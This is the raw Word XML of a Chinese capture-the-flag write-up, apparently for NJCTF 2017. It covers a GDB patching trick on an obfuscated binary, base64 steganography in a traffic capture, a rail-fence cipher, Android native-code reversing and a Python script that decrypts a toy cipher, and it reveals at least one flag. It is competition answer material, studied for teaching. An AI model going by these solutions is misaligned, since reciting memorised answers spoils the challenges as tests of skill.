        <w:t>if i%2==0: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ab/>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>r+=chr(ord(s[i])^22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ab/>
        <w:t>else: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ab/>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>r+=chr(ord(s[i])^23)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print r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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4086860" cy="429260"/>
            <wp:effectExtent l="0" t="0" r="889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E</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>server</w:t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题目混淆的很厉害，IDA基本不能F5，很好奇这种jmp xxx+x是怎么写出来的，求一波源码。</w:t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但是题目本身比较简单，直接上GDB调试，遇到第一个问题是strncmp，这里比较的是F1@g</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就是本题需要输入的数据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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79557F84" wp14:editId="6009E802">
            <wp:extent cx="5266667" cy="43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将其中的数据转换为字符即F1@gA。</w:t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接下来就会在puts后进入一个无限循环，将其patch掉即可。或在gdb中set</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$eax=</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可，执行到程序结束得到输入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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771674B5" wp14:editId="338837BE">
            <wp:extent cx="3876190" cy="12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即得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MISC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T</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>raffic</w:t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26.4M的包，扔到networkminer里没找到什么有用的文件，除了三个readme以外别的文件都小于1k，都是404/403。学长在包里发现了IRC的协议。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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158B6707" wp14:editId="1FFC374F">
            <wp:extent cx="5274310" cy="4186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本着最终出题人的想法，讲其中的base</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dump下来解密发现无卵用。随后有学长想到了base</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐写的姿势，将其解密后再加密输出进行对比，果然有差异。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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E29B48" wp14:editId="756BDADE">
            <wp:extent cx="5274310" cy="23520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ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每行隐藏2bit信息，得到二进制串后，将前面的零保留两个，解密后发现后半段为乱码，考虑到末尾还有多余两位，在乱码开始的地方删除两位，即可得到正确的</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比特。解码后得到flag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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B85BF4" wp14:editId="4CAC694B">
            <wp:extent cx="5076825" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="952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Knock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>韩琛的话想起来无间道 查知乎上的一个莫尔斯电码的问题/</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>但是并没有乱用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后来大佬们用一个神奇的网站解出来了那个纸条上的话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http://quipqiup.com/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结果是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that might be easy you could find the key from this message i used fence to keep the key away from bad as shere is the message in e e alcs tr laae he f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然后提示就是栅栏密码嘛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ineeal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cstrla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aehefg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  <w:t>解了栅栏密码就好了</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>应该是没用到摩斯电码= =</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>结果一交居然成功了。。。（逃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lastRenderedPageBreak/>
        <w:t>Easy crypto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>根据c文件的内容写出python版本的逆程序进行解密就行</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>先算出KEY 再用KEY来解密</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>下面附上代码</w:t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=open('plain.txt','r'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1=open('cipher.txt','r'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2=open('flag.txt','r'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c = f.read(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c1 = f1.read(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c2 = f2.read(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key="OKIWILLLETYOUKNOWWHATTHEKEYIS"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or i in range(len(fc)):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print ord(fc[i]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print "==============="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or j in range(len(fc2)):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print ord(fc2[j]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print "==============="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res=""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preres=""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print len(fc2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or i in range(len(fc2)):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print str(i)+"================"+"\n"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if i==0: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print chr((ord(fc2[i]) &amp; 0xff) - i*i - ord(key[i%len(key)])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preres = chr((ord(fc2[i]) &amp; 0xff) - i*i - ord(key[i%len(key)])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else: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print chr(((((ord(fc2[i]) &amp; 0xff)%256 - i*i)%256 - (ord(key[i%len(key)])^ord(preres))%256)%256+ord(preres))%256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print ((((ord(fc2[i]) &amp; 0xff)%256 - i*i)%256 - (ord(key[i%len(key)])^ord(preres))%256)%256+ord(preres))%256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preres = chr(((((ord(fc2[i]) &amp; 0xff)%256 - i*i)%256 - (ord(key[i%len(key)])^ord(preres))%256)%256+ord(preres))%256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res = res + preres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print res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B22222"/>
        </w:rPr>
        <w:t>    #key="OKIWILLLETYOUKNOWWHATTHEKEYIS"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for i in range(len(fc)):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print str(i)+"========="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lastRenderedPageBreak/>
        <w:t>        if i == 0 :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print chr(((ord(fc1[i]) &amp; 0xff)-i*i-ord(fc[i]))^0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else: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008000"/>
        </w:rPr>
        <w:t>            print chr((((ord(fc1[i]) &amp; 0xff)-i*i)%256-(ord(fc[i])-ord(fc[i-1])))%256^ord(fc[i-1]))</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="B22222"/>
        </w:rPr>
        <w:t>    #flag=NJCTF{N0w_You90t_Th1sC4s3}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Check QQ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0DCE" w:rsidRPr="00112F5A" w:rsidRDefault="009E0DCE" w:rsidP="009E0DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群签到=</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=不说了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MOBILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C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t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asycrack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD3EA1" w:rsidRPr="00FD3EA1" w:rsidRDefault="00FD3EA1" w:rsidP="00FD3EA1">
      <w:r>
        <w:t>ARM二进制分析题, Java里边基本没有内容, 只有一个native需要的固定值msg是从Java中计算然后传进去的, 写个脚本跑一下就能得到这个值.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>程序运行流程是经典的字符串加密, 用户输入经过与msg的异或处理后被与一个I_am_the_key字符串经过复杂但是固定的运算流程得到的值进行加密, 我们称这个值为buffer, 加密过程 buffer 与处理过的用户输入进行加密, 但是加密算法实质是异或可逆, 因此在得知结果的时候即可算出用户输入. 叙述不是特别明确, 简单画图解释:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>user_input(?)  ------&gt; xor  ----&gt; 处理过的输入------------------------------------&gt;crypt--------------&gt;结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msg--------------------&gt;              I_am_the_key------&gt;process------&gt;buffer---&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>通过逆向发现结果作为明文字符串存储在二进制文件中, 因为上述每一步都可逆, 因此可以编写脚本反过来执行, 从结果获得最初的用户输入. 分析过程比较简单, 不具体说明, 详见idb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SafeBox</w:t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/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FB3609" wp14:editId="3B54DBE6">
            <wp:extent cx="5274310" cy="5349875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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0C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看完这个大概就是输入一个八位的数字要满足abcddcba的意思，然后最后三位584中间可以使33/37，然后由于是对称的，貌似应该是48533584=</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=进程序运行也是33是对的，然而要求是字母和数字，</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 35</w:t>
      </w:r>
      <w:r w:rsidRPr="00112F5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没记错的话是#，然后队友说androidTest里面的代码跟这个差不多然而按照androidTest里面那个代码算的话48537584也是可以的，所以就用那个算出flag试着交了一下结果就对了，然而这个结果程序跑看上去是错的所以并没有get到这个题的考点是什么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029460C" w:rsidRPr="00112F5A" w:rsidRDefault="0029460C" w:rsidP="0029460C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0029460C" w:rsidRPr="00112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50"/>
    <w:rsid w:val="00094650"/>
    <w:rsid w:val="00112F5A"/>
    <w:rsid w:val="0029460C"/>
    <w:rsid w:val="00510691"/>
    <w:rsid w:val="009752AB"/>
    <w:rsid w:val="009E0DCE"/>
    <w:rsid w:val="00ED2392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CE9D6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5EE729BF-D511-40D9-8FDC-4A7D60A4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4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46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460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460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294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94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9460C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0029460C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="error">
    <w:name w:val="error"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0029460C"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00294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lddriver/app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mrrd.de/nodejs-hacking-challenge-writeup.html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3D30-8D26-4ADA-B824-568D99F1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80</Words>
  <Characters>13569</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>113</Lines>
  <Paragraphs>31</Paragraphs>
  <ScaleCrop>false</ScaleCrop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o</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pinko</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-13T14:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-15T01:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>